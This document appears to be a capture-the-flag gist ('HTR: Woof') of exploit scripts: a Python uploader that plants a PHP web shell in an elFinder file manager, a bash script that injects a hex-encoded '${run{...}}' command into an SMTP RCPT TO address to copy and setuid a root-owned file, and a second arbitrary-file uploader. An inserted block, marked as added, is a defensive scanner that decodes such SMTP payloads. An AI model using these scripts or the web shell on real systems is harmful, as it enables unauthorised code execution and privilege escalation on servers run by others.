HTR: Woof
```python
import requests
import random
import string


def upload_txt_file(file_name):
    file_data = "<?=`$_POST[0]`?>"
    upload_uri = "http://xxxxxxxxxx/xxx/xx/xxxxxxxxx.x/xxx/xxxxxxxxx.xxxxxxx.php"
    files = {"upload[]": (file_name, file_data, "application/x-httpd-php")}
    data = {"cmd": "upload", "target": "l1_Lw"}
    response = requests.post(upload_uri, files=files, data=data)
    print(f"Uploading file {file_name} to elFinder")
    print(response.text)


upload_txt_file("example.phtml")
```
```bash
#!/bin/bash

#PAYLOAD_SETUID='${run{\x2Fbin\x2Fsh\t-c\t\x22cp\t\x2Froot\x2Froot.txt}}'
PAYLOAD_SETUID='${run{\x2Fbin\x2Fbash\t-c\t\x22cp\t\x2Froot\x2Froot\x2etxt\t\x2fvar\x2fwww\x2fhtml\x2fdev\x2fjs\x2felfinder2\x2e0\x2ffiles\x2froot\x2etxt\x26\x26\tchmod\t4777\t\x2fvar\x2fwww\x2fhtml\x2fdev\x2fjs\x2felfinder2\x2e0\x2ffiles\x2froot\x2etxt\x22}}@localhost'
PAYLOAD=$PAYLOAD_SETUID

exec 3<>/dev/tcp/localhost/25
read -u 3 && echo $REPLY
echo "helo localhost" >&3
read -u 3 && echo $REPLY
echo "mail from:<>" >&3
read -u 3 && echo $REPLY
echo "rcpt to:<$PAYLOAD>" >&3
read -u 3 && echo $REPLY
echo "data" >&3
read -u 3 && echo $REPLY
for i in {1..31}
do
    echo "Received: $i" >&3
done
echo "." >&3
read -u 3 && echo $REPLY
echo "quit" >&3
read -u 3 && echo $REPLY
echo

# wait for the magic to happen and spawn our shell
echo "Waiting 5 seconds..."
ls -la
```
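A defender's view of the SMTP script above, as an added example that is not part of the original gist: it scans SMTP command lines for a `${run{...}}` expansion item (Exim string-expansion syntax) inside a RCPT TO address and decodes the `\xHH` and `\t` escapes so the embedded command is readable during triage. The function names and the sample transcript are constructed for illustration.

```python
import re

# Recipient of an SMTP RCPT command; the script above sends "rcpt to:<...>".
RCPT_RE = re.compile(r"rcpt to:\s*<(.*)>", re.IGNORECASE)
# Expansion item the payload places in the recipient address: ${run{...}}.
RUN_RE = re.compile(r"\$\{run\{(.*?)\}\}", re.IGNORECASE | re.DOTALL)
# Backslash escapes the payload uses in place of "/", ".", quotes and spaces.
ESC_RE = re.compile(r"\\x([0-9A-Fa-f]{2})|\\([tn])")


def decode_escapes(text):
    """Turn \\xHH, \\t and \\n escapes into the characters they stand for."""
    def sub(match):
        if match.group(1):
            return chr(int(match.group(1), 16))
        return {"t": "\t", "n": "\n"}[match.group(2)]
    return ESC_RE.sub(sub, text)


def scan_smtp_lines(lines):
    """Return (line_number, recipient, decoded_command) per suspicious RCPT."""
    findings = []
    for number, line in enumerate(lines, start=1):
        rcpt = RCPT_RE.search(line)
        if not rcpt:
            continue
        for run in RUN_RE.finditer(rcpt.group(1)):
            # Collapse tabs/newlines to single spaces for a readable command.
            command = " ".join(decode_escapes(run.group(1)).split())
            findings.append((number, rcpt.group(1), command))
    return findings


# Constructed sample transcript (hypothetical, not captured traffic).
SAMPLE = [
    "helo localhost",
    "mail from:<>",
    "rcpt to:<alice@example.org>",
    r"RCPT TO:<${run{\x2Fbin\x2Ftrue\t--version}}@localhost>",
    "data",
]

if __name__ == "__main__":
    for number, recipient, command in scan_smtp_lines(SAMPLE):
        print(f"line {number}: run expansion in recipient -> {command}")
```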
```python
import requests


def upload_exe_file(file_name):
    upload_uri = "http://xxxxxxxxxx/xxxxxxxxxx/xxxxxxxxxx/xxxxxxxxxx/xxxxxxxxxx/xxxxxxxxxx.xxxxxxxxxx.xxxxxxxxxx"
    files = {"upload[]": (file_name, open(file_name, "rb"), "application/octet-stream")}
    data = {"cmd": "upload", "target": "l1_Lw"}
    response = requests.post(upload_uri, files=files, data=data)
    print(f"Uploading file {file_name} to elFinder")
    print(response.text)


upload_exe_file("test.sh")
```